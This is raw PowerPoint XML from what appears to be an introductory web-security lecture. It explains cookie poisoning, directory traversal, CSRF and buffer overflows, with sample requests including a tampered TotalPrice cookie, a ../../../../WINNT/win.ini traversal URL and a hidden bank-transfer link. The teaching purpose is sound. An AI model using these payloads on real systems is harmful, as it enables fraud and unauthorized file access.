            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Involve the modification of the contents of a cookie(personal information stored in a Web user's computer) in order to bypass security mechanisms.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookie poisoning is in fact a Parameter Tampering attack, where the parameters are stored in a cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Gain unauthorized information about another user and steal Identity.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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a:rPr>
              <a:t>Cookie Poisoning</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Andalu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fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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sz="2100" dirty="0" smtClean="0"/>
              <a:t>The request includes a cookie that contains the following parameters: SESSIONID, which is a unique identification string that associates the user with the site, BasketSize, the price of each item and the TotalPrice. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>when executed by the Web server, buy.asp retrieves the cookie from the user, analyzes the cookie's parameters and charges the user account according to the TotalPrice parameter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>An attacker can change, for example, the TotalPrice parameter in order to get a "special discount".</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="274638"/>
            <a:ext cx="8229600" cy="639762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Andalus"/>
              </a:rPr>
              <a:t>Cookie Poisoning - Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rounded Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1066800"/>
            <a:ext cx="7391400" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2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GET /store/buy.asp?checkout=yes HTTP/1.0 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Host: www.onlineshop.com </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Accept: */* Referrer: http://www.onlineshop.com/showprods.asp </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cookie: SESSIONID=570321ASDD23SA2321; BasketSize=3; Item1=2892; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Item2=3210; Item3=9942; TotalPrice=16044;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1"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A Path Traversal attack aims to access files and directories that are stored outside the web root folder.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>The attacker uses “../” sequences to move up to root directory, thus permitting navigation through the file system. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>The attacker needs to guess how many directories to climb in order to get to the desired directory. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Attackers might view restricted files or execute powerful commands on the Web server, leading to a full compromise of the Web server.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Andalus" pitchFamily="2" charset="-78"/>
                <a:cs typeface="Andalus" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Directory Traversal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Andalus" pitchFamily="2" charset="-78"/>
              <a:cs typeface="Andalus" pitchFamily="2"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The fact that the vast majority of websites, including those considered most business critical, are riddled with vulnerabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Web applications are accessible openly on web there by making it more prone to hacking.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Web Developers are not well versed with security issues because of which the applications are prone to vulnerabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Web applications run in the browser, any security loop hole in browser will lead to exploiting vulnerability in web application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Andalus" pitchFamily="2" charset="-78"/>
                <a:cs typeface="Andalus" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Inroduction</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Andalus" pitchFamily="2" charset="-78"/>
              <a:cs typeface="Andalus" pitchFamily="2" charset="-78"/>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r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Web server, getnews.asp retrieves the file 20March2003.html from the Web server's file system, renders it and sends it back to the browser which presents it to the user.</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r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>The attacker causes getnews.asp to retrieve the file ../../../../WINNT/win.ini from the file system and send it to the attacker's browser.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="274638"/>
            <a:ext cx="8229600" cy="487362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Andalus" pitchFamily="2" charset="-78"/>
                <a:cs typeface="Andalus" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Directory Traversal - Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rounded Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="3352800"/>
            <a:ext cx="7696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p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>http://www.acme-hackme.com/online/getnews.asp?item=../../../../ WINNT/win.ini</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rounded Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="990600"/>
            <a:ext cx="7315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http://www.acme-hackme.com/online/getnews.asp?item=20March2003.html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endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>An attack that tricks the victim into loading a page that contains a malicious request. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Performs GET/POST request of attacker’s choice on behalf of logged in user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The attacker can make the victim perform actions that they didn't intend to, such as logout, purchase item, change account information, retrieve account information, or any other function provided by the vulnerable website.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Also known as Session Riding, One-Click Attacks, Cross Site Reference Forgery, Hostile Linking, and Automation Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Affected Environments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All web application frameworks are vulnerable to CSRF.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="Andalus"/>
              </a:rPr>
              <a:t>Cross-Site Request Forgery</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:cs typeface="Andalu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487362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Andalus"/>
              </a:rPr>
              <a:t>CSRF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Andalus"/>
              </a:rPr>
              <a:t>Continued</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47106" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7620000" y="304800"/>
            <a:ext cx="1295400" cy="114300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3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="685800"/>
            <a:ext cx="1390650" cy="1533525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1905000"/>
            <a:ext cx="1524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Bank.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rounded Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8229600" y="1524000"/>
            <a:ext cx="9144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11" name="Straight Arrow Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1676400" y="304800"/>
            <a:ext cx="647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505200" y="152400"/>
            <a:ext cx="2514600" cy="304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Logging Request</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Straight Arrow Connector 14"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="47107" idx="3"/>
            <a:endCxn id="47106" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1543050" y="876300"/>
            <a:ext cx="607695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rot="21333331">
            <a:off x="3733800" y="762000"/>
            <a:ext cx="2362200" cy="304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Auth Cookies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="1676400" y="1295400"/>
            <a:ext cx="5943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rot="21123478">
            <a:off x="3665858" y="1234068"/>
            <a:ext cx="2362200" cy="304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Legitimate Request</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47111" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1" y="4953000"/>
            <a:ext cx="1447800" cy="1133475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Straight Connector 24"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="5867400"/>
            <a:ext cx="7391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9" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="6591300" y="3848100"/>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362200" y="5562600"/>
            <a:ext cx="5943600" cy="304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Hacker sends a Malicious href tag to bob</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rounded Rectangle 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="6096000"/>
            <a:ext cx="7162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&lt;a href="http://bank.com/transfer.do?acct=MARIA&amp;amount=100000"&gt;View my Pictures!&lt;/a&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Rounded Rectangle 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581400" y="3505200"/>
            <a:ext cx="2209800"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4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>View My Pictuires</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="36" name="Straight Arrow Connector 35"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="9" idx="1"/>
            <a:endCxn id="34" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="4686300" y="1638300"/>
            <a:ext cx="35433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0"/>
            <a:endCxn id="8" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="2381250" y="1200150"/>
            <a:ext cx="1447800" cy="3162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2"/>
            <a:endCxn id="47111" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="-628649" y="3562351"/>
            <a:ext cx="2743200" cy="38099"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="127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38200" y="3581400"/>
            <a:ext cx="2133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Money Transfer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r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Alice wishes to transfer $100 to Bob using bank.com. The request generated by Alice will look similar to the following:</a:t>
            </a:r>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r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>However, Maria notices that the same web application will execute the same transfer using URL parameters as follows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Maria must trick Alice into submitting the request. The most basic method is to send Alice an HTML email containing the following</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="274638"/>
            <a:ext cx="8229600" cy="411162"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Andalus"/>
              </a:rPr>
              <a:t>CSRF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Andalus"/>
              </a:rPr>
              <a:t>Continued</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1371600"/>
            <a:ext cx="4953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POST http://bank.com/transfer.do HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Content-Length: 19;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>acct=BOB&amp;amount=100</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="3505200"/>
            <a:ext cx="731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http://bank.com/transfer.do?acct=BOB&amp;amount=100 HTTP/1.1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="4876800"/>
            <a:ext cx="845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&lt;a href="http://bank.com/transfer.do?acct=MARIA&amp;amount=100000"&gt;View my Pictures!&lt;/a&gt;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Buffer is storage space for data. Buffer overflow occurs when the user input exceeds the maximum size of the buffer, overwriting the other areas of the memory and corrupting those areas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>It is well known vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Attacker will inject data with shellcode into the allocated stack area. By over-writing return addresses he will run his malicious code.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Andalus"/>
              </a:rPr>
